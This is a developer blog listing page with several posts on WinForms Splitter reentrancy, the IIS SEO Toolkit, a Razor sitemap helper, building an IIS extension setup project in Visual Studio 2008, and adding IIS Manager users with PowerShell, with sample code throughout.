Posts
  • CarlosAg Blog

    The evil WinForms Splitter

    • 1 Comments
    Beware of SplitPosition.
    Today I spent quite some time debugging an issue in the new product I am working on.
Well, to summarize, what I was seeing in our UI was that certain information I expected to be there when a TreeNode was expanded just wasn’t there. It was completely surprising to me, since in that particular code path we do not start multiple threads, use Application.DoEvents, or anything like that; basically all we do is a simple assignment in the TreeView AfterSelect event, something like:

            private void OnTreeViewAfterSelect(object sender, TreeViewEventArgs e) {
                _myObject = DoSomeProcessing();
            }
     
    However, for some reason in another event handler of our TreeView, _myObject was not set. How can this be?
     
Well, after quite some interesting time with VS 2005 (which rocks!), the problem turned out to be an interesting race condition caused by (believe it or not) a WinForms Splitter. What was happening is that DoSomeProcessing changed some properties, which caused the UI to perform a layout, and inside that code we set the SplitPosition property of the Splitter. Well, surprise-surprise: Splitter calls Application.DoEvents in its property setter!
What DoEvents does is basically let Windows pop the next message from the message queue and process it, so the next event was actually fired before the current handler returned, and _myObject ended up not being set.
     
To illustrate the problem with a simple sample, try this code (just copy it into Notepad, save it as TestApp.cs, and compile it using “csc.exe /target:winexe TestApp.cs”):
     
using System;
using System.Drawing;
using System.Threading;
using System.Windows.Forms;

namespace TestApp {
    public class Form1 : Form {

        private TreeView _treeView;
        private Label _label;
        private Splitter _splitter;
        private Button _someButton;

        [STAThread]
        static void Main() {
            Application.Run(new Form1());
        }

        public Form1() {
            InitializeComponent();

            // Just add some nodes...
            TreeNode node = _treeView.Nodes.Add("Node 1");
            node.Nodes.Add("Node 1.1");
            node.Nodes.Add("Node 1.2");
            _treeView.Nodes.Add("Node 2");
        }

        private void InitializeComponent() {
            _treeView = new TreeView();
            _splitter = new Splitter();
            _label = new Label();
            _someButton = new Button();

            SuspendLayout();

            // treeView
            _treeView.Dock = DockStyle.Left;
            _treeView.Location = new Point(5, 28);
            _treeView.TabIndex = 1;
            _treeView.AfterSelect += new TreeViewEventHandler(OnTreeViewAfterSelect);
            _treeView.BeforeSelect += new TreeViewCancelEventHandler(OnTreeViewBeforeSelect);

            // splitter
            _splitter.Location = new Point(126, 28);
            _splitter.TabIndex = 1;
            _splitter.TabStop = false;

            // label
            _label.BackColor = SystemColors.Window;
            _label.BorderStyle = BorderStyle.Fixed3D;
            _label.Dock = DockStyle.Fill;
            _label.Location = new Point(129, 28);
            _label.TabIndex = 2;

            // button
            _someButton.Dock = DockStyle.Top;
            _someButton.Location = new Point(5, 5);
            _someButton.TabIndex = 0;

            // Form
            ClientSize = new Size(500, 400);
            Controls.Add(_label);
            Controls.Add(_splitter);
            Controls.Add(_treeView);
            Controls.Add(_someButton);
            ResumeLayout(false);
        }

        private void OnTreeViewAfterSelect(object sender, TreeViewEventArgs e) {
            _label.Text = "Node selected: " + e.Node.Text;
        }

        private void OnTreeViewBeforeSelect(object sender, TreeViewCancelEventArgs e) {
            // Just sleep 500ms to simulate some work
            Thread.Sleep(500);

            // Now update the SplitPosition
            _splitter.SplitPosition = 100;

            // Simulate 500ms of more work...
            Thread.Sleep(500);
        }
    }
}



     
Run it and click around in the TreeView; notice how badly everything behaves.
Basically, every time you select a different node you get ugly flickering, and you can see the selection jump from the newly selected node back to the previously selected node, and then back to the new one.
     
Well, luckily, Visual Studio 2005 ships a new class called SplitContainer that simplifies everything.
It even adds new features, such as letting you set a minimum size for both the left and the right panel, and many more. Best of all, there is no Application.DoEvents in its code, so your code behaves deterministically.
Bottom line: you do want to use SplitContainer if at all possible.
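As a sketch of what the replacement looks like (the control names here are illustrative, not taken from the sample above), the same tree-plus-detail layout can be built with a SplitContainer; per the point above, moving the splitter programmatically does not pump messages, so there is no reentrancy:

```csharp
using System;
using System.Windows.Forms;

namespace TestApp {
    public class Form2 : Form {
        private SplitContainer _split;
        private TreeView _treeView;
        private Label _label;

        public Form2() {
            _split = new SplitContainer();
            _split.Dock = DockStyle.Fill;
            _split.Panel1MinSize = 100;   // minimum width of the left panel

            _treeView = new TreeView();
            _treeView.Dock = DockStyle.Fill;
            _treeView.AfterSelect += new TreeViewEventHandler(OnAfterSelect);

            _label = new Label();
            _label.Dock = DockStyle.Fill;

            _split.Panel1.Controls.Add(_treeView);
            _split.Panel2.Controls.Add(_label);
            Controls.Add(_split);
        }

        private void OnAfterSelect(object sender, TreeViewEventArgs e) {
            // Unlike Splitter.SplitPosition, setting SplitterDistance does not
            // call Application.DoEvents, so no other events sneak in here.
            _split.SplitterDistance = 100;
            _label.Text = "Node selected: " + e.Node.Text;
        }
    }
}
```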
  • CarlosAg Blog

    Using the SEO Toolkit to generate a Sitemap of a remote Web Site

    • 3 Comments

The SEO Toolkit includes a set of features (like the Robots Editor and Sitemap Editor) that only work when you have a local copy of your Web Site. The reason is that we have to know where to save the generated files (like Robots.txt and Sitemap XML files) without having to ask for physical paths, and we need to verify that the functionality is applied correctly, such as only allowing Robots.txt in the root of a site. Unfortunately this means that if you have a remote server for which you cannot run a local copy, you cannot use those features. (Note that you can still use the Site Analysis tool, since it will crawl your Web Site regardless of platform or framework and store the report locally just fine.)

    The Good News

    The good news is that you can technically trick the SEO Toolkit into thinking you have a working copy locally and allow you to generate the Sitemap or Robots.txt file without too much hassle (“too much” being the key).

For this sample, let’s assume we want to create a Sitemap for a remote Web site; in this case I will use my own Web site (http://www.carlosag.net/), but you can specify your own. Below are the steps you need to follow to enable those features for any remote Web site (even if it is running on another version of IIS or any other Web server).

    Create a Fake Site

    • Open IIS Manager (Start Menu->InetMgr.exe)
    • Expand the Tree until you can see the “Sites” node.
    • Right-click the “Sites” node and select “Add Web Site…”
    • Specify a Name (in my case I’ll use MySite)
    • Click “Select” to choose the DefaultAppPool from the Application Pool list. This will avoid creating an additional AppPool that will never run.
    • Specify a Physical Path where you will want the Robots and Sitemap files to be saved. I recommend creating just a temporary directory that clearly states this is a fake site. So I will choose c:\FakeSite\ for that.
    • Important. Set the Host name so that it matches your Web Site, for example in my case www.carlosag.net.
    • Uncheck the “Start Web site immediately”, since we do not need this to run.
    • Click OK

This is what my Create Site dialog looks like:

    image

    Use the Sitemap Editor

Now that we have a site that the SEO Toolkit thinks is local, you should be able to use the features as usual.

    • Select the new site created above in the Tree
    • Double-click the Search Engine Optimization icon in the Home page
    • Click the link “Create a new Sitemap”
    • Specify a name, in my case Sitemap.xml
• Since this is a remote site, you will see that the physical location option shows an empty list, so change the “URL structure” option to use “<Run new Site Analysis>…”, or, if you already have an analysis, you can choose that.
• If creating a new one, just specify a name and click OK (I will use MySite). At this point the SEO Toolkit starts crawling the remote site to discover links and URLs; when it is done it will present you the virtual namespace structure so you can work with it.
• After the crawling is done, you can check any files you want to include in your Sitemap and leverage the server response to define the changed date and all the other features, as if the content were local. Then click OK.

This is how the dialog looks after it discovered my remote Web site URLs:

    image

You will find your Sitemap.xml generated in the physical directory specified when creating the site (in my case c:\FakeSite\Sitemap.xml).
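The generated file follows the standard sitemaps.org protocol. A minimal example of what such a file contains (the URLs and dates below are illustrative, not the actual generated output):

```xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <loc>http://www.carlosag.net/</loc>
    <lastmod>2010-01-01</lastmod>
  </url>
  <url>
    <loc>http://www.carlosag.net/Tools/</loc>
    <lastmod>2010-01-01</lastmod>
  </url>
</urlset>
```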

    Use the Robots Editor

    Just as with the Sitemap Editor, once you prepare a fake site for the remote server, you should be able to use the Robots Editor and leverage the same Site analysis output to build your Robots.txt file.

    image
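The resulting Robots.txt is a plain-text file in the standard robots exclusion format. For example, a file that blocks one directory for all crawlers and points crawlers at the sitemap might look like this (the disallowed path is illustrative):

```
User-agent: *
Disallow: /private/
Sitemap: http://www.carlosag.net/Sitemap.xml
```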

    Summary

In this post I showed how you can use the Sitemap and Robots Editors included in the SEO Toolkit when working with remote Web sites that might be running on different platforms or different versions of IIS.

  • CarlosAg Blog

    Razor Migration Notes 1: Moving a SitemapPath Control to ASP.NET Web Pages

    • 2 Comments

After many years I decided that it is time to rewrite my Web site using Razor. A bit of history: I started it around 2003 using ASP.NET 1.1. When .NET 2.0 came around in 2005 I migrated to it, and it was great being able to leverage features like MasterPages, Themes, and Sitemaps. Honestly it is a pretty simple Web site, mostly content, so very few controls: the Sitemap, my own custom Menu control, and a couple more. Last week it was moved to .NET 4.0, and it feels about time to go back and update it a bit, both in look and features. So this (if time permits) will be the first in a series of migration notes I write as I move it to ASP.NET Razor (aka WebPages). Do note that this is not meant to be a best practice in any way; these are only my personal notes as I discover more details of the ASP.NET WebPages features and move my own implementation to use them.

So with that, one of the first things I faced during this migration was the use of a SiteMapPath control (asp:SiteMapPath) in my MasterPage (a future post about moving away from MasterPages is coming). I knew about the SiteMap API, so I decided to write a simple Sitemap helper that I can now use anywhere in Razor. The code is pretty simple: it basically generates an unordered list of links using <ul> and <li> with <a> inside, and uses CSS to lay them out in a way that I liked.

    SitemapPath Control in WebForms

    The original code I was using in my MasterPage looked like the following:

    <asp:SiteMapPath CssClass="HeaderText" runat="server" ID="siteMap" ShowToolTips="true" NodeStyle-ForeColor="White" CurrentNodeStyle-Font-Bold="true" />

    And generated the following markup:

    <span id="siteMap" class="HeaderText"><a href="#siteMap_SkipLink"><img alt="Skip Navigation Links" height="0" width="0" src="http://blogs.msdn.com/WebResource.axd?d=S2jbW9E-HYlS0UQoRCcsm94KUJelFI6yS-CQIkFvzT6fyMF-zCI4oIF9bSrGjIv4IvVLF9liJbz7Om3voRpNZ8yQbW3z1KfqYr4e-0YYpXE1&amp;t=634219272564138624" style='border-width:0px;' /></a><span><a title='Home' href='/' style='color:White;'>Home</a></span><span> &gt; </span><span><a title='Free tools for download' href='/Tools/' style='color:White;'>Tools</a></span><span> &gt; </span><span style='color:White;font-weight:bold;'>Code Translator</span><a id='siteMap_SkipLink'></a></span>

    Which looks like the following in the browser:

    image

    I used some CSS to set the color, and background and other stuff, but still to set the last item to bold required me to use a property in the Sitemap to get it to look the way I wanted.

    My Sitemap Helper in Razor

    Since I was familiar with the Sitemap API and my goal was to change as “little” as possible as part of this first migration, I decided to write a Sitemap helper that I can use in my Layout pages. The code in the Page is as simple as it gets, you just call @Helpers.Sitemap() and that’s it (added the Div below to get some context in the markup, but that was already there with the SitemapPath control anyway):

    <div class="bannerPath">
    @Helpers.Sitemap()
    </div>

This new helper version generates the markup below. I don’t know about you, but I can make much more sense of what it says, and I imagine search engines will as well. I decided to use more semantically correct markup, using a <nav> element to signal the navigation section and a list of links.

    <nav>
        <ul class="siteMap">
            <li><a href="http://blogs.msdn.com/" title="Home">Home</a>&nbsp;&gt;&nbsp;</li>
            <li><a href="http://blogs.msdn.com/Tools/" title="Free tools for download">Tools</a>&nbsp;&gt;&nbsp;</li>
            <li><span>Code Translator</span></li>
        </ul>
    </nav>

    And it looks like the following in the browser (I decided to remove the underlining, and have more padding, and a new font, but all of that is CSS):

    image

    The Sitemap helper code

The code for the Sitemap helper is pretty simple: just use the SiteMap API to get the current node. Since I’m picky and wanted to generate the markup in the “right” order (note you could use CSS to float the items to the right instead), I used a Stack to push the nodes while traversing up the hierarchy, and finally popped them to generate each <li>.

    @helper Sitemap()
    {
        SiteMapNode currentNode = SiteMap.CurrentNode;
        <nav>
        <ul class="siteMap">
        @if (currentNode != null)
        {
            // Push into a stack to reverse them
            var node = currentNode;
            var nodes = new Stack<SiteMapNode>();
            while (node.ParentNode != null)
            {
                nodes.Push(node.ParentNode);
                node = node.ParentNode;
            }
           
            while(nodes.Count != 0)
            {
                SiteMapNode n = nodes.Pop();
                <li><a href="@n.Url" title="@n.Description">@n.Title</a>&nbsp;&gt;&nbsp;</li>
            }
            <li><span>@currentNode.Title</span></li>
        }
        else
        {
            <li><span>@Page.Title</span></li>
        }
        </ul>
        </nav>
    }

     

    To make it look the way I wanted I used the following CSS:

.siteMap {
    float: right;
    font-size: 11px;
    color: White;
    display: inline;
    margin-top: 3px;
    margin-bottom: 3px;
    margin-left: 0px;
    margin-right: 10px;
}

.siteMap li, span {
    float: left;
    list-style-type: none;
    padding-left: 5px;
    border-width: 0px;
}

.siteMap span {
    font-weight: bold;
}

.siteMap a, a.Visited {
    color: White;
    text-decoration: none;
}
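For context, the SiteMap API used by the helper reads its data from the site’s Web.sitemap file. A minimal example of that file (these URLs and titles are illustrative, not my actual site map):

```xml
<?xml version="1.0" encoding="utf-8" ?>
<siteMap xmlns="http://schemas.microsoft.com/AspNet/SiteMap-File-1.0">
  <siteMapNode url="~/" title="Home" description="Home">
    <siteMapNode url="~/Tools/" title="Tools" description="Free tools for download">
      <siteMapNode url="~/Tools/Translator/" title="Code Translator"
                   description="Code Translator" />
    </siteMapNode>
  </siteMapNode>
</siteMap>
```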

     

    Conclusion

The SiteMapPath control gives you a really easy way to put together a navigation control based on the SiteMap APIs (and the Web.sitemap file in my case). Creating a simple ASP.NET Razor helper is actually pretty easy, since all the functionality needed is there in the base APIs. Although it required some code (about 20 lines), I now feel I have more control over my markup, can style it any way I want using CSS, and render cleaner markup.

I’m sure there are better ways to do this, but as I said, the goal of this first pass is to push my site out soon with as few changes as possible while keeping the same functionality.

  • CarlosAg Blog

    Creating a Setup Project for IIS Extensions using Visual Studio 2008

    • 2 Comments

    Introduction

IIS 7 provides a rich extensibility model. Whether you are extending the server or the user interface, one critical piece is providing a simple setup application that can install all the required files, add any registration information required, and modify the server settings as required by the extension.
    Visual Studio 2008 provides a set of project types called Setup and Deployment projects specifically for this kind of applications. The output generated for these projects is an MSI that can perform several actions for you, including copying files, adding files to the GAC, adding registry keys, and many more.
    In this document we will create a setup project to install a hypothetical runtime Server Module that also includes a User Interface extension for IIS Manager.
    Our setup will basically perform the following actions:
    •    Copy the required files, including three DLL’s and an html page.
    •    Add a couple of registry keys.
    •    Add the managed assemblies to the GAC
    •    Modify applicationHost.config to register a new module
    •    Modify administration.config to register a new UI extensibility for InetMgr
    •    Create a new sample application that exposes the html pages
    •    Finally, we will remove the changes from both configuration files during uninstall

    Creating the Setup Project

    Start Visual Studio 2008. In the File Menu, select the option New Project.
    In the New Project Dialog, expand the Other Project Types option in the Project type tree view.
    Select the option Setup and Deployment type and select the option Setup Project. Enter a name for the Project and a location. I will use SampleSetup as the name.

    image

    Adding Files to the Setup

    • Select the menu View->Editor->File System. This will open the editor where you can add all the files that you need to deploy with your application. In this case I will just add an html file that I have created called readme.htm.
• To do that, right-click the Application Folder directory in the tree view and select the option Add File. Browse to your files and select all the files you want to copy to the setup folder (by default <Program Files>\<Project Name>).

    Adding assemblies to the GAC

    Adding assemblies to the setup is done in the same File System editor, however it includes a special folder called Global Assembly Cache that represents the GAC in the target system.
    In our sample we will add to the GAC the assemblies that have the runtime server module and the user interface modules for IIS Manager. I have created the following set of projects:

    1. SampleModule.dll that includes the runtime module on it.
    2. SampleModuleUI.dll that contains the server-side portion of the IIS Manager extension (ModuleProvider, ModuleService, etc).
    3. SampleModuleUIClient.dll that contains the client side portion of the IIS Manager extension (Module, ModulePage, TaskLists, etc).


    Back in Visual Studio,

    • Select the menu option View->Editor->File System
• Right-click the root node in the tree view titled File System on Target Machine, select the option Add Special Folder, and then select the option Global Assembly Cache Folder.
• Right-click the newly added GAC folder, choose the option Add File, browse to the DLL, and choose OK. Another option is to use Add Assembly and use the "Select Component" dialog to add it.
  Visual Studio will recognize the dependencies the assembly has and will try to add them to the project automatically. However, certain assemblies such as Microsoft.Web.Administration, or any other system assemblies, should be excluded because they will already be installed on the target machine.
• To ensure that you don't ship system assemblies, in the Solution Explorer expand the Detected Dependencies folder, right-click each of the assemblies that shouldn't be packaged, and select the option Exclude. (In our case we will exclude Microsoft.Web.Administration.dll, Microsoft.Web.Management.dll, Microsoft.ManagementConsole.dll and MMCFxCommon.dll.)

After completing this, the project should look as follows:

    image

    Adding Registry Keys

Visual Studio also includes a Registry editor that helps you add registry keys on the target machine. For this sample I will just add a registry key in HKEY_LOCAL_MACHINE\Software\My Company\Message. For that:

• Select the menu option View->Editor->Registry.
• Expand the HKEY_LOCAL_MACHINE node and drill down to Software\[Manufacturer]. [Manufacturer] is a variable that holds the name of the company; it can be set by selecting the SampleSetup node in Solution Explorer and changing it in the Property Grid. There are several other variables defined, such as Author, Description, ProductName, Title and Version, that help whenever dynamic text is required.
• Right-click [Manufacturer] and select the option New String Value. Enter Message as the name. To set the value, select the item in the list view and use the Property Grid.

After completing this, the project should look as follows:

image

    Executing Custom Code

To support custom code being executed when running the setup application, Visual Studio (more precisely, MSI) supports the concept of Custom Actions. These Custom Actions include running an application or a script, or executing code from a managed assembly.
For our sample, we will create a new project where we will add all the code to read and change configuration.

• Select the option File->Add->New Project.
• Select the Class Library template and name it SetupHelper.

    image

    • Since we will be creating a custom action, we need to add a reference to System.Configuration.Install to be able to create the custom action. Use the Project->Add Reference. And in the .NET Tab select the System.Configuration.Install and press OK.
    • Since we will also be modifying server configuration (for registering the HTTP Module in ApplicationHost.config and the ModuleProvider in administration.config) using Microsoft.Web.Administration we need to add a reference to it as well. Again use the Project->Add Reference, and browse to <windows>\system32\inetsrv and select Microsoft.Web.Administration.dll
• Rename the file Class1.cs to SetupAction.cs and make the class name SetupAction. This class needs to inherit from System.Configuration.Install.Installer, which is the base class for all custom actions; it has several methods you can override to add custom logic to the setup process. In this case we will add our code in the Install and Uninstall methods.
using System;
using System.ComponentModel;
using System.Configuration.Install;

namespace SetupHelper {

    [RunInstaller(true)]
    public class SetupAction : Installer {

        public override void Install(System.Collections.IDictionary stateSaver) {
            base.Install(stateSaver);

            // Add a UI Module Provider to administration.config
            InstallUtil.AddUIModuleProvider(
                "SampleUIModule",
                "SampleUIModule.SampleModuleProvider, SampleUIModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
            );

            // Add a Server Module to applicationHost.config
            InstallUtil.AddModule(
                "SampleModule",
                "SampleModule.SampleModule, SampleModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
            );

            // Create a web application
            InstallUtil.CreateApplication(
                "Default Web Site",
                "/SampleApp",
                Context.Parameters["TargetDir"]
            );
        }

        public override void Uninstall(System.Collections.IDictionary savedState) {
            base.Uninstall(savedState);

            InstallUtil.RemoveUIModuleProvider("SampleUIModule");
            InstallUtil.RemoveModule("SampleModule");
            InstallUtil.RemoveApplication("Default Web Site", "/SampleApp");
        }
    }
}
       

As you can see, the code above is actually really simple: it just calls helper methods in a utility class called InstallUtil that is shown at the end of this entry. You will also need to add the InstallUtil class to the project to be able to compile it. The only interesting piece of code above is how we pass the TargetDir from the setup project to the custom action through the Parameters property of the InstallContext type.

    Configuring the Custom Action

To be able to use our new Custom Action, we need to add the SetupHelper output to our setup project. For that:

• Select the option View->Editor->File System.
• Right-click the Application Folder node, select the option Add Project Output..., and select the SetupHelper project in the Project drop-down.

    image

    After doing this, the DLL will be included as part of our setup.

    Adding the Install Custom Action

• Select the option View->Editor->Custom Actions.
• Right-click the Install node, select the option Add Custom Action…, drill down into the Application Folder, and select the Primary output from SetupHelper.

    image

    Click OK and type a name such as InstallModules

    Now, since we want to pass the TargetDir variable to be used as the physical path for the web application that we will create within our Installer derived-class, select the custom action and go to the Property Grid. There is a property called CustomActionData. This property is used to pass any data to the installer parameters class, and uses the format “/<name>=<value>”. So for our example we will set it to: /TargetDir="[TARGETDIR]\"

    image
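Inside the Installer-derived class, the value configured in CustomActionData surfaces through the Context.Parameters dictionary. A minimal sketch (the class name PathProbe is hypothetical; in the original sample this read happens inside SetupAction.Install):

```csharp
using System.ComponentModel;
using System.Configuration.Install;

namespace SetupHelper {
    [RunInstaller(true)]
    public class PathProbe : Installer {
        public override void Install(System.Collections.IDictionary stateSaver) {
            base.Install(stateSaver);
            // /TargetDir="[TARGETDIR]\" set in CustomActionData arrives here:
            string targetDir = Context.Parameters["TargetDir"];
            // targetDir now holds the installation folder the user chose.
        }
    }
}
```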

    Adding the Uninstall Custom Action

    In the same editor, right-click the Uninstall node and select the option Add Custom Action…, again drill down into the Application Folder and select the Primary output from SetupHelper.
    Press OK and type a name such as UninstallModules.
    After doing this the editor should look as follows:

    image

    Building and Testing the Setup

Finally, we can build the solution using the Build->Rebuild Solution menu option.
This creates a file called SampleSetup.msi in the folder SampleSetup\SampleSetup\Debug\.
You can now run this MSI and it will walk you through the installation process. The default user interface can be configured to add new steps or remove current ones, and you can also provide a banner logo for the wizard windows and set many more options from View->Editor->User Interface.

image

    Visual Studio provides different packaging mechanisms for the setup application. You can change it through the Project Properties dialog where you get the option to use:
    1)    As loose uncompressed files. This option packages all the files by just copying them into a file system structure where the files are copied unchanged. This is a good packaging option for CD or DVD based setups
    2)    In setup file. This option packages all the files within the MSI file
    3)    In cabinet files. This option creates a set of CAB files that can be used in scenarios such as diskette based setup.

You can also customize all the setup properties using the Property Grid, such as DetectNewerInstalledVersion, which warns users if a newer version is already installed, or RemovePreviousVersions, which automatically removes older versions when the user installs a new one.

     

    64-bit considerations

It turns out that the managed-code custom action will fail on 64-bit platforms because it is executed as a 32-bit custom action. The following blog post discusses the details and shows how you can fix the issue:

    http://blogs.msdn.com/heaths/archive/2006/02/01/64-bit-managed-custom-actions-with-visual-studio.aspx

     

     

    Summary

    Visual Studio 2008 provides a simple option to easily create Setup applications that can perform custom code through Custom actions. In this document we created a simple custom action to install modules and InetMgr extensions through this support.

    For the latest information about IIS 7.0, see the IIS 7 Web site at http://www.iis.net

    InstallUtil

This is the class used from the SetupHelper project we created to do the actual changes in configuration. As you can see, it only has six public methods: AddModule, AddUIModuleProvider, CreateApplication, RemoveApplication, RemoveModule, and RemoveUIModuleProvider. The other methods are just helpers that facilitate reading configuration.

using System;
using Microsoft.Web.Administration;

namespace SetupHelper {

    public static class InstallUtil {

        /// <summary>
        /// Registers a new Module in the Modules section inside ApplicationHost.config
        /// </summary>
        public static void AddModule(string name, string type) {
            using (ServerManager mgr = new ServerManager()) {
                Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
                ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
                ConfigurationElementCollection modules = modulesSection.GetCollection();

                if (FindByAttribute(modules, "name", name) == null) {
                    ConfigurationElement module = modules.CreateElement();
                    module.SetAttributeValue("name", name);
                    if (!String.IsNullOrEmpty(type)) {
                        module.SetAttributeValue("type", type);
                    }

                    modules.Add(module);
                }

                mgr.CommitChanges();
            }
        }

        public static void AddUIModuleProvider(string name, string type) {
            using (ServerManager mgr = new ServerManager()) {

                // First register the Module Provider
                Configuration adminConfig = mgr.GetAdministrationConfiguration();

                ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
                ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
                if (FindByAttribute(moduleProviders, "name", name) == null) {
                    ConfigurationElement moduleProvider = moduleProviders.CreateElement();
                    moduleProvider.SetAttributeValue("name", name);
                    moduleProvider.SetAttributeValue("type", type);
                    moduleProviders.Add(moduleProvider);
                }

                // Now register it so that all Sites have access to this module
                ConfigurationSection modulesSection = adminConfig.GetSection("modules");
                ConfigurationElementCollection modules = modulesSection.GetCollection();
                if (FindByAttribute(modules, "name", name) == null) {
                    ConfigurationElement module = modules.CreateElement();
                    module.SetAttributeValue("name", name);
                    modules.Add(module);
                }

                mgr.CommitChanges();
            }
        }

        /// <summary>
        /// Create a new Web Application
        /// </summary>
        public static void CreateApplication(string siteName, string virtualPath, string physicalPath) {
            using (ServerManager mgr = new ServerManager()) {
                Site site = mgr.Sites[siteName];
                if (site != null) {
                    site.Applications.Add(virtualPath, physicalPath);
                }
                mgr.CommitChanges();
            }
        }

        /// <summary>
        /// Helper method to find an element based on an attribute
        /// </summary>
        private static ConfigurationElement FindByAttribute(ConfigurationElementCollection collection, string attributeName, string value) {
            foreach (ConfigurationElement element in collection) {
                if (String.Equals((string)element.GetAttribute(attributeName).Value, value, StringComparison.OrdinalIgnoreCase)) {
                    return element;
                }
            }

            return null;
        }

        public static void RemoveApplication(string siteName, string virtualPath) {
            using (ServerManager mgr = new ServerManager()) {
                Site site = mgr.Sites[siteName];
                if (site != null) {
                    Application app = site.Applications[virtualPath];
                    if (app != null) {
                        site.Applications.Remove(app);
                        mgr.CommitChanges();
                    }
                }
            }
        }

        /// <summary>
        /// Removes the specified module from the Modules section by name
            /// </summary>
            public static void RemoveModule(string name) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
                   
    ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
                   
    ConfigurationElementCollection modules = modulesSection.GetCollection();
                   
    ConfigurationElement module = FindByAttribute(modules, "name", name);
                   
    if (module != null) {
                       
    modules.Remove(module);
                   
    }

                   
    mgr.CommitChanges();
               
    }
           
    }


           
    /// <summary>
            /// Removes the specified UI Module by name
            /// </summary>
            public static void RemoveUIModuleProvider(string name) {
               
    using (ServerManager mgr = new ServerManager()) {
                   
    // First remove it from the sites
                    Configuration adminConfig = mgr.GetAdministrationConfiguration();
                   
    ConfigurationSection modulesSection = adminConfig.GetSection("modules");
                   
    ConfigurationElementCollection modules = modulesSection.GetCollection();
                   
    ConfigurationElement module = FindByAttribute(modules, "name", name);
                   
    if (module != null) {
                       
    modules.Remove(module);
                   
    }

                   
    // now remove the ModuleProvider
                    ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
                   
    ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
                   
    ConfigurationElement moduleProvider = FindByAttribute(moduleProviders, "name", name);
                   
    if (moduleProvider != null) {
                       
    moduleProviders.Remove(moduleProvider);
                   
    }

                   
    mgr.CommitChanges();
               
    }
           
    }
       
    }
    }
  • CarlosAg Blog

    Adding IIS Manager Users and Permissions using PowerShell

    • 2 Comments

    Today somebody asked in the IIS.net Forums how they could automate the process of adding IIS Manager Users and their permissions using a script or a command line, and I thought it would be useful to post something that hopefully will be easy to find and refer to.

    They had found one way to do it by editing configuration directly; however, the password was not getting stored encrypted.

    The first thing that I would like to highlight is that the password is not encrypted; it is actually stored as a hash. This means that just entering the password in clear text will not work; the only way it will work is if you calculate the same hash our current implementation does.

    Having said that, manually adding the users is not a good idea anyway, since the IIS Manager functionality is extensible and its storage can be replaced to keep the users in SQL Server or any other back end. Our built-in implementation stores them in Administration.config, but at any given time someone could have a different provider, which means your code would not work either.
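    To make the point concrete, the built-in provider keeps these users in a section of Administration.config shaped roughly like the following. This is an illustrative sketch from memory (the element and attribute names may differ between versions); the important part is that the password attribute holds a hash, not the clear-text password:

    ```xml
    <system.webServer>
      <management>
        <authentication defaultProvider="ConfigurationAuthenticationProvider">
          <credentials>
            <!-- password is a hash computed by the provider, not the clear-text password -->
            <add name="MyUser" password="[base64 hash]" enabled="true" />
          </credentials>
        </authentication>
      </management>
    </system.webServer>
    ```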

    So then what is the right way? Well, the right way is using the existing APIs we surface in Microsoft.Web.Management.dll, in particular Microsoft.Web.Management.Server.ManagementAuthentication and Microsoft.Web.Management.Server.ManagementAuthorization. Using these APIs makes sure the right provider gets called with the correct arguments, ensuring that you do not have to implement or know any details about their implementation.

    These types are really easy to consume from managed code, but it does mean you have to write code. The good news is that through PowerShell this gets as simple as it can possibly get.

    So just launch PowerShell (make sure it is running elevated as administrator).

    Here is how you add a user and grant them access to the Default Web Site:

    [System.Reflection.Assembly]::LoadWithPartialName("Microsoft.Web.Management") 
    [Microsoft.Web.Management.Server.ManagementAuthentication]::CreateUser("MyUser", "ThePassword")
    [Microsoft.Web.Management.Server.ManagementAuthorization]::Grant("MyUser", "Default Web Site", $FALSE)
  • CarlosAg Blog

    Announcing: IIS SEO Toolkit v1.0 release

    • 3 Comments

    Today we are announcing the final release of the IIS Search Engine Optimization (SEO) Toolkit v1.0. This version builds upon the Beta 1 and Beta 2 versions and is 100% compatible with them, so any report you currently have continues to work in the new version. The new version includes a set of bug fixes and new features such as:

    1. Extensibility. In this version we are opening a new set of APIs to allow you to develop extensions for the crawling process, including the ability to augment the metadata in the report with your own, extend the set of tasks provided in the Site Analysis and Sitemaps user interface, and more. More on this in an upcoming post.
    2. New Reports. Based on feedback we added a Redirects summary report in the Links section, as well as a new Link Depth report that lets you easily see which pages are the "most hidden" pages in your site; in other words, if a user landed at your site's home page, "how many clicks are needed to reach a particular page".
    3. New Routes Query. We added a new type of query called Routes. This is the underlying data that powers the "Link Depth" report mentioned above; however, it is also exposed as a new query type so that you can create your own queries to customize the start page and other things, like filtering, grouping, etc.
    4. New option to opt out of keeping a local cache of files. We added a new switch in the "Advanced Settings" of the New Analysis dialog to disable keeping the files stored locally. This lets you run an analysis that is faster and consumes far less disk space than when the files are cached. The only side effect is that you will not get the "Content" tab, the contextual position of the links, or the Word Analysis feature. Everything else continues to work just as in any other report.
    5. HTML Metadata is now stored in the report. By leveraging the extensibility mentioned in bullet 1, the HTML parser now stores the content of all HTML META tags so that you can later use them in your own queries, whether to filter, group, or just export data. This gives you a very interesting set of options if you have any metadata such as Author or any custom tags.
    6. Several Bug Fixes:
      1. Internal URLs linked by External URLs now are also included in the crawling process.
      2. Groupings in queries should be case sensitive
      3. Show contextual information (link position) in Routes
      4. The Duplicate detection logic should only include valid responses (do not include 404 NOT Found, 401, etc)
      5. Canonical URLs should support sub-domains.
      6. Several Accessibility fixes. (High DPI, Truncation in small resolutions, Hotkeys, Keyboard navigation, etc).
      7. Several fixes for Right-To-Left languages. (Layout and UI)
      8. Help shortcuts enabled.
      9. New Context Menus for Copying content
      10. Add link position information for Canonical URLs
      11. Remove x-javascript validation for this release
      12. Robots algorithm should be case sensitive
      13. many more

    This version can upgrade both the Beta 1 and Beta 2 versions, so go ahead and try it, and PLEASE provide us with feedback and any additional things you would like to see in the next version at the SEO Forum on the IIS Web site.

    Click here to install the IIS SEO Toolkit.

  • CarlosAg Blog

    Using IIS Manager Users Authentication in your Web Application

